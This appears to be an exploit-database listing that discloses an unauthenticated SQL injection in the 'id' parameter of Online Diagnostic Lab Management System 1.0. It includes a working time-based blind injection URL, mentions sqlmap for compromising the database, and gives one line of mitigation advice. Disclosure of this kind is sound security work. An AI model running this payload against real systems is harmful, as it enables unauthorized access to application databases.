header-logo
Suggest Exploit
vendor:
Online Diagnostic Lab Management System
by:
Himash
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Online Diagnostic Lab Management System
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE: a:sourcecodester:online_diagnostic_lab_management_system:1.0
Metasploit:
Other Scripts:
Platforms Tested: Kali Linux 2021.4, PHP 7.2.34
2022

Online Diagnostic Lab Management System 1.0 – SQL Injection (Unauthenticated)

SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Online Diagnostic Lab Management System 1.0 is vulnerable to the SQL Injection in 'id' parameter of the 'appointment list' page. Following URL is vulnerable to SQL Injection in the 'id' field. http://localhost/odlms/?page=appointments/view_appointment&id=1%27%20AND%20(SELECT%208053%20FROM%20(SELECT(SLEEP(7)))dJOC)%20AND%20%27test%27=%27test Server accepts the payload and the response get delayed by 7 seconds. An attcker can compromise the database of the application by manual method or by automated tools such as SQLmap.

Mitigation:

Input validation, parameterized queries, and stored procedures can help mitigate SQL injection attacks.
Source

Exploit-DB raw data:

#Exploit Title: Online Diagnostic Lab Management System 1.0 - SQL Injection (Unauthenticated)
#Date: 11/01/2022
#Exploit Author: Himash
#Vendor Homepage: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html
#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/odlms.zip
#Version: 1.0
#Tested on: Kali Linux 2021.4, PHP 7.2.34

#SQL Injection
SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database.
Online Diagnostic Lab Management System 1.0 is vulnerable to the SQL Injection in 'id' parameter of the 'appointment list' page.

#Steps to reproduce 

Following URL is vulnerable to SQL Injection in the 'id' field.

http://localhost/odlms/?page=appointments/view_appointment&id=1%27%20AND%20(SELECT%208053%20FROM%20(SELECT(SLEEP(7)))dJOC)%20AND%20%27test%27=%27test

Server accepts the payload and the response get delayed by 7 seconds.

#Impact

An attcker can compromise the database of the application by manual method or by automated tools such as SQLmap.

Navigation

Suggest Exploit

Services By CQR